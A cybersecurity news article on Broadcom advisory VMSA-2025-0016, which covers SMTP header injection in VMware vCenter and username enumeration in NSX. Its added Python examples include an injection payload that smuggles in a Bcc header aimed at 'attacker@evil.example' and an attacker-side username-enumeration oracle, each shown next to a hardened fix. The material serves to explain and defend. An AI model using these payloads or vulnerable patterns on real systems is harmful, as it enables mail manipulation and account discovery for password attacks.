Red Hot Cyber, The cybersecurity news


Three serious vulnerabilities discovered in VMware vCenter and NSX: apply patches immediately.

RHC editorial team: 29 September 2025 21:49

On September 29, 2025, Broadcom released security advisory VMSA-2025-0016, which addresses three vulnerabilities in VMware vCenter and VMware NSX. The bugs affect several products in the VMware ecosystem and are all rated High, with CVSSv3 base scores between 7.5 and 8.5.

The vulnerabilities affect the following components and platforms:

  • VMware vCenter Server
  • VMware NSX and NSX-T
  • VMware Cloud Foundation
  • VMware Telco Cloud Platform
  • VMware Telco Cloud Infrastructure

Vulnerability Details

The identified vulnerabilities are tracked as CVE-2025-41250, CVE-2025-41251 and CVE-2025-41252.

CVE-2025-41250 – SMTP Header Injection in vCenter
vCenter Server lets user-controlled input reach the headers of the notification e-mails it sends. An authenticated user without administrative rights, but with permission to create scheduled tasks, can inject additional SMTP headers and thereby manipulate the notification e-mails the system sends. The vulnerability has a maximum CVSSv3 score of 8.5.

  • Resolution : Install the patches indicated in the Response Matrix.
  • Acknowledgements : Report by Per von Zweigbergk .
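The mechanics of this bug class, as an added example that is not code from Broadcom, VMware or this article: a notification mailer assembles the message by string concatenation and drops a user-supplied task name into the Subject header, so a name containing CR/LF terminates that header and starts new ones (here a Bcc). The hardened builder rejects any header value containing a line break. The task name, addresses and sender are constructed sample data, not vCenter's real templates.

```python
"""SMTP header injection: vulnerable builder, hardened builder, and a minimal
MTA-style header parser to show what the receiving side would actually see.
All names and addresses below are constructed for the example."""

CRLF = "\r\n"

FROM_ADDR = "vcenter-alerts@example.internal"   # constructed sample sender


def build_notification_vulnerable(task_name: str, recipient: str) -> str:
    """Drops the user-supplied task name straight into the Subject header.
    A task name containing CR/LF therefore ends the Subject line and starts
    new header lines of the attacker's choosing."""
    headers = [
        f"From: {FROM_ADDR}",
        f"To: {recipient}",
        f"Subject: Scheduled task '{task_name}' completed",
    ]
    body = f"The scheduled task '{task_name}' has completed.{CRLF}"
    return CRLF.join(headers) + CRLF + CRLF + body


class HeaderInjectionError(ValueError):
    """Raised when a value destined for a mail header contains line breaks."""


def sanitize_header_value(value: str) -> str:
    """Rejects CR, LF and NUL. Bare LF is included because many MTAs accept it
    as a line terminator even though RFC 5322 specifies CRLF."""
    if any(ch in value for ch in ("\r", "\n", "\0")):
        raise HeaderInjectionError(f"line break in header value: {value!r}")
    return value


def build_notification_hardened(task_name: str, recipient: str) -> str:
    """Same message layout, but every header value is validated first."""
    subject = sanitize_header_value(f"Scheduled task '{task_name}' completed")
    to_addr = sanitize_header_value(recipient)
    headers = [f"From: {FROM_ADDR}", f"To: {to_addr}", f"Subject: {subject}"]
    body = f"The scheduled task '{task_name}' has completed.{CRLF}"
    return CRLF.join(headers) + CRLF + CRLF + body


def parse_headers(raw_message: str) -> dict:
    """Splits the header block the way a receiving MTA does: one header per
    CRLF-terminated line, ending at the first empty line. Returns a mapping of
    lower-cased header name -> list of values."""
    head, _, _body = raw_message.partition(CRLF + CRLF)
    headers: dict = {}
    for line in head.split(CRLF):
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def injected_recipients(task_name: str, recipient: str) -> list:
    """Addresses the vulnerable builder would leak the mail to via an injected Bcc."""
    raw = build_notification_vulnerable(task_name, recipient)
    return parse_headers(raw).get("bcc", [])


def hardened_rejects(task_name: str, recipient: str) -> bool:
    """True if the hardened builder refuses the input."""
    try:
        build_notification_hardened(task_name, recipient)
    except HeaderInjectionError:
        return True
    return False


if __name__ == "__main__":
    # Constructed payload: closes the Subject line, adds a Bcc header and parks
    # the remainder of the original Subject text in a harmless X- header.
    payload = "Backup" + CRLF + "Bcc: attacker@evil.example" + CRLF + "X-Ignore: "
    print(injected_recipients(payload, "admin@example.internal"))   # ['attacker@evil.example']
    print(hardened_rejects(payload, "admin@example.internal"))      # True
```

The same payload in a field that lands in the message body would be harmless; the injection only works because the value is placed inside the header block, which is why validation has to happen at the point where a value becomes a header. Python's own email.message.EmailMessage refuses multi-line header values under its default policy, so using it instead of hand-built strings closes this hole by construction.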

CVE-2025-41251 – Weak password recovery mechanism in NSX
VMware NSX has a flaw in its password-recovery mechanism. An unauthenticated attacker can abuse it to enumerate valid usernames, which gives a starting point for brute-force or password-guessing attempts against those accounts and could facilitate unauthorized access. The issue has a maximum CVSSv3 score of 8.1.

  • Resolution : Install the fixed versions listed in the advisory's Response Matrix.
  • Acknowledgements : Reported by the National Security Agency (NSA).

CVE-2025-41252 – Username Enumeration in NSX
A second vulnerability in VMware NSX likewise allows an unauthenticated attacker to enumerate valid accounts, increasing the risk of unauthorized access attempts. The vulnerability has a maximum CVSSv3 score of 7.5.

  • Resolution : Install the official patches listed in the Response Matrix.
  • Acknowledgements : Also reported by the National Security Agency (NSA).
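The weakness shared by CVE-2025-41251 and CVE-2025-41252, modelled generically as an added example that is not code from Broadcom, VMware NSX or this article: an unauthenticated password-recovery endpoint that answers differently (and does different work) for existing and non-existing accounts, an attacker-side oracle that turns those differences into a username list, and the hardened form that responds identically and performs the same work either way. The user table, usernames, response texts and server secret are constructed sample data; the real NSX endpoints are not reproduced.

```python
"""Username enumeration through a password-recovery endpoint: vulnerable and
hardened handlers plus the enumeration oracle an attacker would use.
Everything below (accounts, secret, messages) is constructed sample data."""

import hashlib
import hmac
import secrets

# Constructed sample account store: username -> contact address.
USERS = {
    "admin": "admin@example.internal",
    "nsx-ops": "ops@example.internal",
}

# Records what each handler would actually dispatch; a real service queues mail.
OUTBOX = []

SECRET = b"constructed-server-secret"


def _make_reset_token(username: str) -> str:
    """Work a real recovery flow does for an existing user. The hardened
    handler runs it for every request so timing does not reveal existence."""
    nonce = secrets.token_bytes(16)
    return hmac.new(SECRET, nonce + username.encode(), hashlib.sha256).hexdigest()


def recover_vulnerable(username: str):
    """Leaks account existence two ways: a different status code and message for
    unknown users, and token/mail work only for known users (timing channel)."""
    if username not in USERS:
        return 404, {"error": "user not found"}
    token = _make_reset_token(username)
    OUTBOX.append((USERS[username], token))
    return 200, {"message": f"Reset link sent to {USERS[username]}"}


def recover_hardened(username: str):
    """Same status, same body and same work whether or not the account exists;
    only the side effect (sending the mail) depends on the lookup."""
    token = _make_reset_token(username)          # always computed
    if username in USERS:
        OUTBOX.append((USERS[username], token))  # the only conditional step
    return 200, {"message": "If an account with that username exists, a reset link has been sent."}


def enumerate_users(handler, candidates):
    """Attacker-side oracle: compare each candidate's response with the response
    for a username that almost certainly does not exist. Any difference in
    status or body marks the candidate as a valid account."""
    baseline = handler("nonexistent-" + secrets.token_hex(8))
    return sorted(name for name in candidates if handler(name) != baseline)


def mails_sent_for(handler, username: str) -> int:
    """Number of messages a handler actually dispatches for one request."""
    OUTBOX.clear()
    handler(username)
    return len(OUTBOX)


if __name__ == "__main__":
    wordlist = ["admin", "guest", "nsx-ops", "root"]     # constructed candidate list
    print(enumerate_users(recover_vulnerable, wordlist))  # ['admin', 'nsx-ops']
    print(enumerate_users(recover_hardened, wordlist))    # []
    print(mails_sent_for(recover_hardened, "admin"),      # 1
          mails_sent_for(recover_hardened, "guest"))      # 0
```

The oracle needs no credentials and only one baseline request, which is what makes an unauthenticated enumeration flaw valuable as the first stage of a password-guessing campaign. Uniform responses and uniform work are how such an endpoint is fixed in code; for NSX itself the advisory lists no workaround, so the fixed versions are the only remedy, and the usual controls (rate limiting on recovery and login endpoints, alerting on bursts of recovery requests for distinct usernames from one source) reduce exposure until they are applied.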

Broadcom recommends applying the patches listed in the advisory immediately to all affected products. No workarounds or temporary mitigations are available. Note that the vCenter fix (CVE-2025-41250) and the NSX fixes (CVE-2025-41251, CVE-2025-41252) are separate updates, and that deployments of these components through VMware Cloud Foundation or the Telco Cloud products must apply the corresponding fixed versions listed in the Response Matrix for those bundles.

Editorial team
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who collaborate actively to provide early information and news on cybersecurity and computing in general.
